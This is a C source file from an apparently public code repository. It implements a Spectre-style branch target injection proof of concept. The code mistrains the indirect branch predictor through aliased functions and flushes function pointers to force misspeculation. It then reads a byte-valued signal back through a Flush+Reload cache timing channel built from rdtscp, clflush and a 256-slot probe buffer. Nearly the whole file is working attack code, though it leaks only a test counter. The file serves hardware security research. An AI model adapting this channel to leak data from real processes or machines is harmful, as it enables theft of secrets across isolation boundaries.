-
Notifications
You must be signed in to change notification settings - Fork 4
/
single.c
161 lines (131 loc) · 4.39 KB
/
single.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
#include <inttypes.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <x86intrin.h>
#include "common.h"
// Number of distinct probe slots, i.e. the bandwidth of the channel from
// speculative execution back to architectural (von Neumann) execution:
// 256 slots carry one byte of information per round.
// The tradeoff: more bandwidth means more places in probe_buf that
// check_probes() has to time and flush.
#define NUM_PROBES 256
// MAX_PROBE_SPACE bounds the stride (in bytes) between consecutive probes;
// it is the modulus applied to cur_probe_space in measure() and the size of
// the region reserved per probe in main().
// An irregular stride thwarts a clever CPU's stride prediction
// (e.g. "you loaded buf[0], buf[1024], I'll load buf[2048] for you").
// When a stride works badly we generally do not see ANY winning probe,
// in which case measure() changes cur_probe_space and retries.
#define MAX_PROBE_SPACE (1000003)
uint64_t cur_probe_space = 4177;
// The (heap-allocated) probe buffer, allocated in main().
// It holds NUM_PROBES probe slots; the cache state of
// &probe_buf[i*cur_probe_space] communicates the value i from
// speculative -> von Neumann execution.
uint8_t *probe_buf;
// A simple counter, accessed by the speculative function (target_fn)
// so it has a value to compute on. measure() increments it after each
// round that produced a winning probe.
uint8_t signal_idx = 0;
// Stats, accumulated by check_probes() and reset by measure() after every round
uint64_t cache_hits = 0; // Number of cache hits (probe read in <140 cycles)
// NOTE(review): the original comment said "i.e. 10k" trials, but the loop in
// measure() makes 1000 indirect() calls per round -- confirm the intended count.
uint64_t tot_runs = 0; // Number of check_probes() calls (trials) this round
uint64_t tot_time = 0; // Total cycles spent on reads that counted as hits
unsigned int junk=0; // Receives the aux output of _rdtscp(); value is unused
// target_fn is defined in assembly (target_fn.S).
// It is never called directly (essentially dead code).
// However, indirect.c trains the processor to think the indirect
// jump in common.c::indirect() is going to call this function.
// We flush the fn_ptr used by indirect(), forcing the CPU to
// (mis)speculate and start processing this function.
// In reality, the CPU will (eventually) call check_probes(),
// where we collect results and see what's in the cache.
void target_fn(void) __attribute__((section(".targetfn")));
// Empty function placed in its own section (.aliastargetfn).
// measure() stores its address in alias_fn_ptr.
// NOTE(review): presumably the section is positioned so that this function
// aliases target_fn in the branch predictor -- confirm against the linker script.
void alias_target_fn(void) __attribute__((section(".aliastargetfn")));
void alias_target_fn(void) {
}
// Per-slot hit counters for the current round: results[i] is the number of
// times probe slot i was read in under 140 cycles.
uint64_t results[NUM_PROBES];

// Time a one-byte load from every probe slot, count the fast ones as cache
// hits, then flush all slots again so the next trial starts from a cold cache.
// Updates cache_hits, tot_time, results[] and tot_runs.
void check_probes() {
    int slot;

    for (slot = 0; slot < NUM_PROBES; slot++) {
        uint8_t *probe = &probe_buf[slot*cur_probe_space];
        uint64_t start, elapsed;

        // Timed region: nothing but the byte load sits between the two
        // timestamp reads.
        start = _rdtscp(&junk);
        asm volatile( "movb (%%rbx), %%al\n"
                :: "b"(probe) : "rax");
        elapsed = _rdtscp(&junk) - start;

        if (elapsed >= 140) {
            // Slow read: not counted as a cache hit.
            continue;
        }

        cache_hits += 1;
        tot_time += elapsed;
        results[slot] += 1;
    }

    tot_runs += 1;

    // Evict every probe slot from the cache again.
    for (slot = 0; slot < NUM_PROBES; slot++) {
        _mm_clflush(probe_buf + slot*cur_probe_space);
    }
}
uint64_t jmp_ptr;
void measure() {
fn_ptr = check_probes;
alias_fn_ptr = alias_target_fn;
//jmp_ptr = 0x400e60;
jmp_ptr = 0;
int i, j;
while (1) {
for (i=0; i<1000; i++) {
for (j=0; j<100; j++) {
_mm_clflush(&alias_fn_ptr);
_mm_clflush(&fn_ptr);
_mm_clflush(&jmp_ptr);
if (j == 95) {
indirect(&jmp_ptr);
} else {
alias_indirect(&jmp_ptr);
}
}
}
uint64_t avg = 0;
if (cache_hits > 0) avg = tot_time/cache_hits;
uint64_t max_res=0, max_i=0;
for (i=0; i<NUM_PROBES; i++) {
if (results[i]>max_res) {
max_res = results[i];
max_i = i;
}
}
if (max_res > 10 && avg < 80){
printf("[%lu]: %lu / %lu = %0.5f%% hits, %lu avg cycles, ps %ld\n", max_i, max_res, tot_runs, 100*((float)max_res)/tot_runs, avg, cur_probe_space);
signal_idx++;
} else {
printf("--[%lu]: %lu, %lu avg cycles ps %ld\n", max_i, max_res, avg, cur_probe_space);
cur_probe_space += 63;
cur_probe_space %= MAX_PROBE_SPACE;
}
cache_hits = 0;
tot_runs = 0;
tot_time = 0;
memset(results, 0, sizeof(uint64_t)*NUM_PROBES);
signal_idx %= NUM_PROBES;
usleep(10);
}
}
// Allocate and initialise the probe buffer, then hand control to measure(),
// which loops forever. Returns -1 if the buffer cannot be allocated.
int main(void)
{
    // One MAX_PROBE_SPACE-byte region per probe slot. The stride used at
    // run time is always below MAX_PROBE_SPACE, so every slot address
    // probe_buf[i*cur_probe_space] stays inside the allocation.
    // Sizes and offsets are computed in size_t so the products cannot
    // overflow int if NUM_PROBES or MAX_PROBE_SPACE is ever raised.
    const size_t region = MAX_PROBE_SPACE;

    probe_buf = malloc(region * NUM_PROBES);
    if (probe_buf == NULL) {
        perror("malloc");
        return -1;
    }
    // %p requires a void * argument.
    printf("probe_buf @%p\n", (void *)probe_buf);

    for (size_t i = 0; i < NUM_PROBES; i++) {
        // Fill region i with the byte value i, then make sure the slot at
        // the current stride starts out uncached.
        memset(&probe_buf[i * region], (int)i, region);
        _mm_clflush(&probe_buf[i * cur_probe_space]);
    }

    fn_ptr = check_probes;
    measure();

    // Not reached: measure() never returns.
    return 0;
}